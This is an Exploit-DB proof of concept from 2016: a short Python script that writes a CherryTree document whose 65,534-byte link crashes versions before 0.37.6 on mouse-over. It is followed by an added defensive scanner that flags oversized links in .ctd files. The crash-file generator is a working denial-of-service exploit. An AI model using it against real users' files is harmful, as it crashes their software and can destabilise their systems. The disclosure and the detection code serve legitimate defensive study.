CherryTree 0.36.9 – Memory Corruption (PoC)

  • Author: n30m1nd
    Date: 2016-10-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40638/
  • #!/usr/bin/python
    
    ### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###
    
    # Date: 2016-10-27
    # PoC Author: n30m1nd
    # Vendor Homepage: http://www.giuspen.com/cherrytree/
    # Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
    # Version: Affects all versions of CherryTree prior to 0.37.6
    # Tested on: Win7 64bit and Win10 64bit
    
    # Credits
    # =======
    # Thanks to Giuseppe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
    # Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
    
    # How to
    # ======
    # * Run this python script. It will generate a "PoC-1.ctd" file.
    # * Open the file in CherryTree and hover the mouse over the link.
    # Bonus
    # =====
    # It will also crash if you click on the link (but sometimes it will also make your graphics drivers stop working...)
    
    # Why?
    # ====
    # From what we have seen while debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer
    # dereference when trying to draw the contents of the graphical bitmaps.
    
    # Exploit code
    # ============
    
    # A CherryTree document (.ctd) is plain XML; the link attribute of the
    # rich_text element is what the viewer renders when the pointer hovers over it.
    crashfile = '''<?xml version="1.0" ?>
    <cherrytree>
    <node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
    <rich_text link="node 1 ''' + "A" * 65534 + '''">MOUSE OVER THIS</rich_text>
    </node>
    </cherrytree>
    '''
    
    # Write the document; the with-block closes the file on exit.
    with open("PoC-1.ctd", 'w') as f:
        f.write(crashfile)
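The crash above is triggered purely by the content of a .ctd file, so a defender can pre-screen documents before they reach a vulnerable CherryTree build. The following scanner is an added example and is not part of the original PoC or of the CherryTree project: it parses a .ctd document as XML and flags every rich_text link attribute longer than a threshold. The threshold MAX_LINK_LEN, the function name find_oversized_links and the two sample documents are constructed for this example; the page does not state what limit the 0.37.6 fix enforces, so the value is an assumption chosen to separate ordinary links from the 65534-byte pattern shown above.

```python
#!/usr/bin/env python3
"""Scan CherryTree .ctd documents for oversized rich_text link attributes.

Added example (not from the PoC author or the CherryTree project).
"""
import sys
import xml.etree.ElementTree as ET

# Assumed threshold: ordinary CherryTree links are short ("node 1", "webs http://...").
# The real fix's limit is not given on the page, so this is an illustrative value.
MAX_LINK_LEN = 4096


def find_oversized_links(ctd_xml, max_len=MAX_LINK_LEN):
    """Return a list of (node_unique_id, link_length) for every rich_text
    element whose link attribute is longer than max_len.

    ctd_xml is the document text (a str). Any parse error propagates so the
    caller can treat an unparsable document as suspicious in its own way.
    """
    root = ET.fromstring(ctd_xml)
    findings = []
    for node in root.iter("node"):
        node_id = node.get("unique_id", "?")
        for rich_text in node.iter("rich_text"):
            link = rich_text.get("link")
            if link is not None and len(link) > max_len:
                findings.append((node_id, len(link)))
    return findings


def scan_file(path, max_len=MAX_LINK_LEN):
    """Read a .ctd file from disk and return its findings."""
    with open(path, "r", encoding="utf-8") as handle:
        return find_oversized_links(handle.read(), max_len)


# Constructed sample documents for offline use.
BENIGN_CTD = '''<?xml version="1.0" ?>
<cherrytree>
<node custom_icon_id="0" foreground="" is_bold="False" name="Notes" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
<rich_text link="webs http://example.invalid/">a normal link</rich_text>
</node>
</cherrytree>
'''

# Same shape as the PoC above: a "node 1 " link padded with 65534 bytes.
OVERSIZED_CTD = '''<?xml version="1.0" ?>
<cherrytree>
<node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
<rich_text link="node 1 ''' + "A" * 65534 + '''">MOUSE OVER THIS</rich_text>
</node>
</cherrytree>
'''


if __name__ == "__main__":
    # With file arguments: scan each file. Without: demonstrate on the samples.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            for node_id, length in scan_file(path):
                print("%s: node %s has a %d-byte link (limit %d)"
                      % (path, node_id, length, MAX_LINK_LEN))
    else:
        print("benign sample:", find_oversized_links(BENIGN_CTD))
        print("oversized sample:", find_oversized_links(OVERSIZED_CTD))
```

Run it as `python3 ctd_scan.py suspicious.ctd` to check files before opening them in a CherryTree build older than 0.37.6; the reported length for the PoC document is 65541 (the 7-byte "node 1 " prefix plus 65534 padding bytes).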